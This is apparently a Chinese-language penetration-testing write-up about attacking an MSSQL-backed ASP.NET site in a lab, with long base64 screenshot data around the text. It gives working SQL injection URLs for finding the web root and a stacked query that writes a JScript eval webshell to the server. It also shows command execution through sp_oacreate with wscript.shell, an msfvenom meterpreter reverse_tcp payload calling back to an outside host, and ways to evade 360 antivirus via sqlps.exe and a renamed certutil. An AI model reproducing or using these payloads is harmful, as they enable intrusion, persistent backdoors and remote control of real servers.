13/gYQECx1oTI9PZ3SO28fNPuampqw21MYM2Y0l1xyiems8mzfQTxn1ebNm7nqyiv7zijnfB6s7Lvuzm6M4pyFuqiJgc75ldztBFWYXMWjBMW7ltpamF/Jg07jPZU8F1WwjDFuoJ/9XHNXpaUQqAuGAWHU28Cjq8y2JT7ufj7xRhdbVVHRyfzKu1TBsbWWn65aBVEFy9jrXMt8HqwMLCLPVdby09qgYLn/zRqeeusoF8xdxPVTgUNb+GPdH6m3f4OS6SPDujz4yW46hkxkRC+FSoDRo0f3vhNBEARBEARBEJJiQMLAAf6xrQ2b3ca03BzS0lKx2+2B/G+XXjyTr3z5coqv+xpTJk/CZlPfs9lsKIqCz+9HUWxs+6cnwVGbeLcJZi40C1LZX7u/H0TDdv708yfZkn8bj4R53qmC1GkjVJ5GXHT7wzyyMJ8ta1bwp+hx1L0mO/8Ssmnn3ab2sPc217vYm1XMHHnGMZkwfjz33nMX6enpvP3O33jmf35rEirvvecuJowfP2j27djxITa7jcmTPhd2Vs2Y7uSSSy5i1hWzmDhhQsSz6oMPPho0+4UoeBt4tHIdzKvk7iIrlc1Lw8ZWcM43CHdOvj3fiXfjRvTsCdNDhT1nEdc4oLUpQpx+zHEBWnmuthXn/MgCoHeP12ybYxZFTvA2t+K1vCGecWPgbUBdEoNnpHM+851eXtvYi/mGeVE6uabIAa1NgXXe334Acr+uCpUAo2cycyJ89tEujoR1eIADh2BkdhZ9oFUmzOq/H2DcE60ov/p7XC/br5q5bJ2Hd/YeGwRrBUEQBEEQBOHUZsA8K7u7u/D7/WRljaOjowOfz4/NpmCz2fjCZZfwhcsuAaCl9R9U/fev8PtBUVSvpeHDhnL02Am6u7uSGru9vR3IivSuIXw3S/3vdvX64+WLgPyg992WJ7lnTTC3ZXbJ/fzka1q/W1zUtedzx4/j96wLDRc3eQcGvOKK2bn8SfRUhaYxjfYHusk3eQtufmIRj7cXc8el7/F4fbshbFrzAiX8PtUbVb1at3wRdWQZvPNCxwu3KfKY/cTMYuZkraCuvonr9HFCnlXQhvaEnrHJ9uxruT7fxeObmtj7NaMgrYri2SX52rXIa2uFvl7G8PLwvXFb+I1RbI
|
|||
|
|
<p blockindex=28>在网页中需要使用注入查表得到结果,如果直接查询可能会报错需要转换一下</p>
|
|||
|
|
<pre blockindex=29><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=-1 union select null,null,(select top 1 convert(varchar(100),dir COLLATE Chinese_PRC_CI_AS) from FoundStone_Bank.dbo.tmp),null,null</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=30><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=31>MSSQL和MYSQL不同没有LIMIT需要用where来过滤不想要的结果</p>
|
|||
|
|
<pre blockindex=32><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=-1 union select null,null,(select top 1 convert(varchar(100),dir COLLATE Chinese_PRC_CI_AS) from FoundStone_Bank.dbo.tmp WHERE DIR not in (SELECT TOP 1 dir FROM FoundStone_Bank.dbo.tmp)),null,null</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=33>类似这样,前面的top 1不用改,where中的top 从0开始增长就可以,sqlmap也是同种方式</p>
|
|||
|
|
<p blockindex=34>虽然xp_dirtree的方法繁琐但是还是可以有效的找到绝对路径,要么网站和数据库不在同个地方这就办法了</p>
|
|||
|
|
<pre blockindex=35><code class="hljs language-sql"><span class=hljs-keyword>select</span> host_name(); <span class=hljs-operator>/</span><span class=hljs-operator>/</span>主机名
|
|||
|
|
<span class=hljs-keyword>select</span> @<span class=hljs-variable>@servername</span>; <span class=hljs-operator>/</span><span class=hljs-operator>/</span>服务器名
|
|||
|
|
<span class=hljs-operator>/</span><span class=hljs-operator>/</span>如果相同则代表数据库和web在同一台机器上面
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=36>得到根目录后用Scripting.FileSystemObject中CreateTextFile和WriteLine来实现写入webshell</p>
|
|||
|
|
<p blockindex=37>注意有拦截的话上面肯定有360webshell要免杀</p>
|
|||
|
|
<pre blockindex=38><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=1;</span>
|
|||
|
|
<span class=hljs-keyword>declare</span> @f <span class=hljs-keyword>int</span>,@g <span class=hljs-keyword>int</span>
|
|||
|
|
exec sp_oacreate <span class=hljs-string>'Scripting.FileSystemObject'</span>,@f output
|
|||
|
|
EXEC SP_OAMETHOD @f,<span class=hljs-string>'CreateTextFile'</span>,@f OUTPUT,<span class=hljs-string>'c:\inetpub\wwwroot\shell.aspx'</span>,<span class=hljs-number>1</span>
|
|||
|
|
EXEC sp_oamethod @f,<span class=hljs-string>'WriteLine'</span>,<span class=hljs-literal>null</span>,<span class=hljs-string>'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a+b));%>'</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=39>拿到shell了基本是IIS的用户,这里本来可以直接通过juicypotato提权</p>
|
|||
|
|
<p blockindex=40>但是360不知道从什么时候开始加上了CrteateProcesWithToken的hook就提权不了了</p>
|
|||
|
|
<p blockindex=41>整理了一下想着mssql本来就是高权限的,只要想办法用mssql来执行木马就可以了</p>
|
|||
|
|
<h1 blockindex=42>0x03 权限提升</h1>
|
|||
|
|
<p blockindex=43>说明一下只有mssql2005是直接高权限,这次的测试环境搭建的时候使用管理员启动的mssql,所以mssql实际的权限取决于网站管理员</p>
|
|||
|
|
<p blockindex=44>在护网中也有碰到过用administrator起mssql的网站管理员,所以下面的方法就是提供一种思路</p>
|
|||
|
|
<p blockindex=45>在网上搜索了一下发现用wscript.shell可以不调用cmd执行程序</p>
|
|||
|
|
<pre blockindex=46><code class="hljs language-sql"><span class=hljs-keyword>declare</span> <span class=hljs-variable>@o</span> <span class=hljs-type>int</span>;
|
|||
|
|
<span class=hljs-keyword>exec</span> sp_oacreate <span class=hljs-string>'wscript.shell'</span>,<span class=hljs-variable>@o</span> <span class=hljs-keyword>out</span>;
|
|||
|
|
<span class=hljs-keyword>exec</span> sp_oamethod <span class=hljs-variable>@o</span>,<span class=hljs-string>'run'</span>,<span class=hljs-keyword>null</span>,<span class=hljs-string>'calc'</span>;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=47><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=48>可以看到在sqlserver的进程中启动了计算器</p>
|
|||
|
|
<p blockindex=49>但是上传上去的木马,运行了就会提示某某程序在入侵sqlserver不让运行</p>
|
|||
|
|
<p blockindex=50>经过多次测试后发现</p>
|
|||
|
|
<ol blockindex=51>
|
|||
|
|
<li>在系统目录中无害的程序是不杀的,像calc,ipconfig,tasklist这些,哪怕复制到别的路径来也不拦截</li>
|
|||
|
|
<li>有数字签名的</li>
|
|||
|
|
</ol>
|
|||
|
|
<p blockindex=52>像cmd,powershell啥的在系统目录中但是也被杀的死死的</p>
|
|||
|
|
<p blockindex=53>还有一个关键点,有数字签名的程序创建的进程要是不可信还是会被拦截,只要检测到父进程是sqlserver就会杀的特别四</p>
|
|||
|
|
<p blockindex=54>那么需要找一个有数字签名的,可以直接加载到内存中的程序就可以上线了</p>
|
|||
|
|
<p blockindex=55>在mssql的目录中看到了sqlps.exe有点眼熟,找了一下发现最近有篇文章就是关于sqlps的</p>
|
|||
|
|
<p blockindex=56><a href="https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg%3D%3D&mid=2247491483&idx=1&sn=5c43d9377fb5729104665e00040c2f36&scene=21&ref=www.ctfiot.com#wechat_redirect">https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg%3D%3D&mid=2247491483&idx=1&sn=5c43d9377fb5729104665e00040c2f36&scene=21&ref=www.ctfiot.com#wechat_redirect</a></p>
|
|||
|
|
<p blockindex=57>可以说是一个功能不全的powershell吧,但是可以直接执行ps1脚本,这样就不会创建进程导致被杀软拦截</p>
|
|||
|
|
<pre blockindex=58><code class="hljs language-php">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<span class=hljs-number>10.130</span>.<span class=hljs-number>4.204</span> LPORT=<span class=hljs-number>60001</span> -f psh-reflection > shell.ps1
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=59>这里要用msf生成的脚本,cs生成会出现问题执行不了</p>
|
|||
|
|
<p blockindex=60>将生成的脚本上传到服务器,上传的的方法有很多,可以用远程下载,也可以像webshell一样写入</p>
|
|||
|
|
<p blockindex=61>远程下载只需要将Certutil.exe重命名,然后放到别的目录就可以了</p>
|
|||
|
|
<p blockindex=62><img src=data:image/png;base64,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